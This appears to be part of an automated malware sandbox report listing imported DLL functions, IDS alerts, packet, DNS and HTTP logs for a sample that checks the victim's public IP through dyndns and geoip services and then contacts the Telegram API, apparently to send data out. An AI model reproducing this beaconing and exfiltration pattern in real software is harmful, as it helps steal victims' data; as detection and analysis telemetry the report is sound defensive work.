OLEAUT32.dll	LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-10T22:13:36.248694+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49704	193.122.130.0	80	TCP
2025-01-10T22:13:37.733222+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49704	193.122.130.0	80	TCP
2025-01-10T22:13:38.298023+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49706	104.21.80.1	443	TCP
2025-01-10T22:13:38.842442+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49707	193.122.130.0	80	TCP
2025-01-10T22:13:39.951861+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49709	193.122.130.0	80	TCP
2025-01-10T22:13:41.639770+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49712	104.21.80.1	443	TCP
2025-01-10T22:13:46.038913+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49721	104.21.80.1	443	TCP
2025-01-10T22:13:46.957061+0100	1810007	Joe Security ANOMALY Telegram Send Message	1	192.168.2.8	49723	149.154.167.220	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:13:35.593903065 CET	49704	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:35.598692894 CET	80	49704	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:35.598773003 CET	49704	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:35.599004030 CET	49704	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:35.603810072 CET	80	49704	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:36.079662085 CET	80	49704	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:36.091152906 CET	49704	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:36.095993042 CET	80	49704	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:36.197774887 CET	80	49704	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:36.248693943 CET	49704	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:36.572647095 CET	49705	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:36.572690010 CET	443	49705	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:36.572798967 CET	49705	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:36.713984966 CET	49705	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:36.714011908 CET	443	49705	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:37.182739973 CET	443	49705	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:37.182893038 CET	49705	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:37.212749958 CET	49705	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:37.212771893 CET	443	49705	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:37.213310003 CET	443	49705	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:37.264338017 CET	49705	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:37.307508945 CET	49705	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:37.351344109 CET	443	49705	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:37.510066032 CET	443	49705	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:37.510231018 CET	443	49705	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:37.510309935 CET	49705	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:37.542222977 CET	49705	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:37.573887110 CET	49704	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:37.580570936 CET	80	49704	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:37.683274984 CET	80	49704	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:37.685983896 CET	49706	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:37.686041117 CET	443	49706	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:37.686105967 CET	49706	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:37.686933041 CET	49706	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:37.686953068 CET	443	49706	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:37.733222008 CET	49704	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:38.150868893 CET	443	49706	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:38.169939995 CET	49706	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:38.169975996 CET	443	49706	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:38.298115969 CET	443	49706	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:38.298285007 CET	443	49706	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:38.298336983 CET	49706	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:38.298851013 CET	49706	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:38.302047014 CET	49704	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:38.303307056 CET	49707	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:38.307614088 CET	80	49704	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:38.307661057 CET	49704	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:38.308149099 CET	80	49707	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:38.308216095 CET	49707	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:38.308370113 CET	49707	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:38.313200951 CET	80	49707	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:38.799928904 CET	80	49707	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:38.801861048 CET	49708	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:38.801908016 CET	443	49708	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:38.801983118 CET	49708	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:38.802387953 CET	49708	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:38.802408934 CET	443	49708	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:38.842442036 CET	49707	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:39.259435892 CET	443	49708	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:39.261722088 CET	49708	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:39.261753082 CET	443	49708	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:39.419291019 CET	443	49708	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:39.419368982 CET	443	49708	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:39.419425011 CET	49708	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:39.420083046 CET	49708	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:39.423620939 CET	49707	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:39.424899101 CET	49709	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:39.428582907 CET	80	49707	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:39.428644896 CET	49707	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:39.429657936 CET	80	49709	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:39.429739952 CET	49709	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:39.429843903 CET	49709	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:39.434560061 CET	80	49709	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:39.911894083 CET	80	49709	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:39.913228035 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:39.913356066 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:39.913482904 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:39.913753033 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:39.913796902 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:39.951860905 CET	49709	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:40.368562937 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:40.370343924 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:40.370373011 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:40.526365995 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:40.526438951 CET	443	49710	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:40.526550055 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:40.527158976 CET	49710	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:40.534658909 CET	49711	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:40.539515018 CET	80	49711	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:40.539618969 CET	49711	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:40.539737940 CET	49711	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:40.544496059 CET	80	49711	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:41.009404898 CET	80	49711	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:41.012231112 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:41.012265921 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:41.012325048 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:41.012593031 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:41.012607098 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:41.061225891 CET	49711	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:41.486779928 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:41.488579035 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:41.488596916 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:41.639899015 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:41.640101910 CET	443	49712	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:41.640203953 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:41.641083956 CET	49712	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:41.647995949 CET	49711	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:41.649200916 CET	49713	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:41.653163910 CET	80	49711	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:41.653228998 CET	49711	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:41.654531002 CET	80	49713	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:41.654659986 CET	49713	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:41.654685020 CET	49713	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:41.659434080 CET	80	49713	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:42.112885952 CET	80	49713	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:42.114234924 CET	49714	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:42.114279032 CET	443	49714	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:42.114640951 CET	49714	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:42.114641905 CET	49714	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:42.114676952 CET	443	49714	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:42.154952049 CET	49713	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:42.577699900 CET	443	49714	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:42.579637051 CET	49714	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:42.579668045 CET	443	49714	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:42.736644983 CET	443	49714	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:42.736715078 CET	443	49714	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:42.736767054 CET	49714	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:42.737515926 CET	49714	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:42.741036892 CET	49713	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:42.742302895 CET	49715	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:42.747172117 CET	80	49713	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:42.747334003 CET	49713	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:42.747396946 CET	80	49715	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:42.747493982 CET	49715	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:42.748915911 CET	49715	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:42.754195929 CET	80	49715	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:43.228657007 CET	80	49715	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:43.230003119 CET	49716	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:43.230038881 CET	443	49716	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:43.230096102 CET	49716	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:43.230432987 CET	49716	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:43.230447054 CET	443	49716	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:43.280034065 CET	49715	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:43.686419964 CET	443	49716	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:43.688397884 CET	49716	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:43.688436985 CET	443	49716	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:43.840828896 CET	443	49716	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:43.840894938 CET	443	49716	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:43.840969086 CET	49716	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:43.841419935 CET	49716	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:43.844871044 CET	49715	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:43.846009016 CET	49717	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:43.849838018 CET	80	49715	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:43.850873947 CET	80	49717	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:43.850893021 CET	49715	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:43.850945950 CET	49717	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:43.851037025 CET	49717	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:43.855725050 CET	80	49717	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:44.326091051 CET	80	49717	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:44.327836037 CET	49718	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:44.327929974 CET	443	49718	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:44.328036070 CET	49718	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:44.329085112 CET	49718	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:44.329118013 CET	443	49718	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:44.373806000 CET	49717	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:44.808121920 CET	443	49718	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:44.809742928 CET	49718	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:44.809812069 CET	443	49718	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:44.958467007 CET	443	49718	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:44.958551884 CET	443	49718	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:44.958777905 CET	49718	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:44.959032059 CET	49718	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:44.962075949 CET	49717	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:44.963248014 CET	49720	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:44.967016935 CET	80	49717	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:44.967067003 CET	49717	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:44.968015909 CET	80	49720	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:44.968067884 CET	49720	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:44.968206882 CET	49720	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:44.972964048 CET	80	49720	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:45.424164057 CET	80	49720	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:45.425369024 CET	49721	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:45.425411940 CET	443	49721	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:45.425498962 CET	49721	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:45.425728083 CET	49721	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:45.425743103 CET	443	49721	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:45.467466116 CET	49720	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:45.896505117 CET	443	49721	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:45.900239944 CET	49721	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:45.900260925 CET	443	49721	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:46.038957119 CET	443	49721	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:46.039019108 CET	443	49721	104.21.80.1	192.168.2.8
Jan 10, 2025 22:13:46.039164066 CET	49721	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:46.039587021 CET	49721	443	192.168.2.8	104.21.80.1
Jan 10, 2025 22:13:46.073461056 CET	49720	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:46.079576015 CET	80	49720	193.122.130.0	192.168.2.8
Jan 10, 2025 22:13:46.079632998 CET	49720	80	192.168.2.8	193.122.130.0
Jan 10, 2025 22:13:46.082524061 CET	49723	443	192.168.2.8	149.154.167.220
Jan 10, 2025 22:13:46.082545996 CET	443	49723	149.154.167.220	192.168.2.8
Jan 10, 2025 22:13:46.082649946 CET	49723	443	192.168.2.8	149.154.167.220
Jan 10, 2025 22:13:46.083091974 CET	49723	443	192.168.2.8	149.154.167.220
Jan 10, 2025 22:13:46.083102942 CET	443	49723	149.154.167.220	192.168.2.8
Jan 10, 2025 22:13:46.715466022 CET	443	49723	149.154.167.220	192.168.2.8
Jan 10, 2025 22:13:46.715544939 CET	49723	443	192.168.2.8	149.154.167.220
Jan 10, 2025 22:13:46.717647076 CET	49723	443	192.168.2.8	149.154.167.220
Jan 10, 2025 22:13:46.717652082 CET	443	49723	149.154.167.220	192.168.2.8
Jan 10, 2025 22:13:46.717937946 CET	443	49723	149.154.167.220	192.168.2.8
Jan 10, 2025 22:13:46.719501972 CET	49723	443	192.168.2.8	149.154.167.220
Jan 10, 2025 22:13:46.763325930 CET	443	49723	149.154.167.220	192.168.2.8
Jan 10, 2025 22:13:46.957082033 CET	443	49723	149.154.167.220	192.168.2.8
Jan 10, 2025 22:13:46.957148075 CET	443	49723	149.154.167.220	192.168.2.8
Jan 10, 2025 22:13:46.957472086 CET	49723	443	192.168.2.8	149.154.167.220
Jan 10, 2025 22:13:46.961487055 CET	49723	443	192.168.2.8	149.154.167.220
Jan 10, 2025 22:13:53.529243946 CET	49709	80	192.168.2.8	193.122.130.0

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 22:13:35.576817989 CET	52394	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:13:35.584291935 CET	53	52394	1.1.1.1	192.168.2.8
Jan 10, 2025 22:13:36.564611912 CET	62633	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:13:36.571784019 CET	53	62633	1.1.1.1	192.168.2.8
Jan 10, 2025 22:13:46.074071884 CET	56904	53	192.168.2.8	1.1.1.1
Jan 10, 2025 22:13:46.081897974 CET	53	56904	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 22:13:35.576817989 CET	192.168.2.8	1.1.1.1	0x9bc0	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:36.564611912 CET	192.168.2.8	1.1.1.1	0xcb89	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:46.074071884 CET	192.168.2.8	1.1.1.1	0xf5d7	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 22:13:35.584291935 CET	1.1.1.1	192.168.2.8	0x9bc0	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 22:13:35.584291935 CET	1.1.1.1	192.168.2.8	0x9bc0	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:35.584291935 CET	1.1.1.1	192.168.2.8	0x9bc0	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:35.584291935 CET	1.1.1.1	192.168.2.8	0x9bc0	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:35.584291935 CET	1.1.1.1	192.168.2.8	0x9bc0	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:35.584291935 CET	1.1.1.1	192.168.2.8	0x9bc0	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:36.571784019 CET	1.1.1.1	192.168.2.8	0xcb89	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:36.571784019 CET	1.1.1.1	192.168.2.8	0xcb89	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:36.571784019 CET	1.1.1.1	192.168.2.8	0xcb89	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:36.571784019 CET	1.1.1.1	192.168.2.8	0xcb89	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:36.571784019 CET	1.1.1.1	192.168.2.8	0xcb89	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:36.571784019 CET	1.1.1.1	192.168.2.8	0xcb89	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:36.571784019 CET	1.1.1.1	192.168.2.8	0xcb89	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 22:13:46.081897974 CET	1.1.1.1	192.168.2.8	0xf5d7	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	193.122.130.0	80	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:13:35.599004030 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 22:13:36.079662085 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 578bab6d43261325c76da0e3e1a3f670 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:13:36.091152906 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:13:36.197774887 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:36 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 13550d67d812ec20292f58fb1d95beab Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 22:13:37.573887110 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:13:37.683274984 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: cca225d6d67b146950eec5b768ff5eea Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49707	193.122.130.0	80	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:13:38.308370113 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 22:13:38.799928904 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 21:13:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2befe7ed2b3f2e60e18822b56fa6374a Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49709	193.122.130.0	80	6012	C:\Windows\SysWOW64\svchost.exe

Timestamp	Bytes transferred	Direction	Data
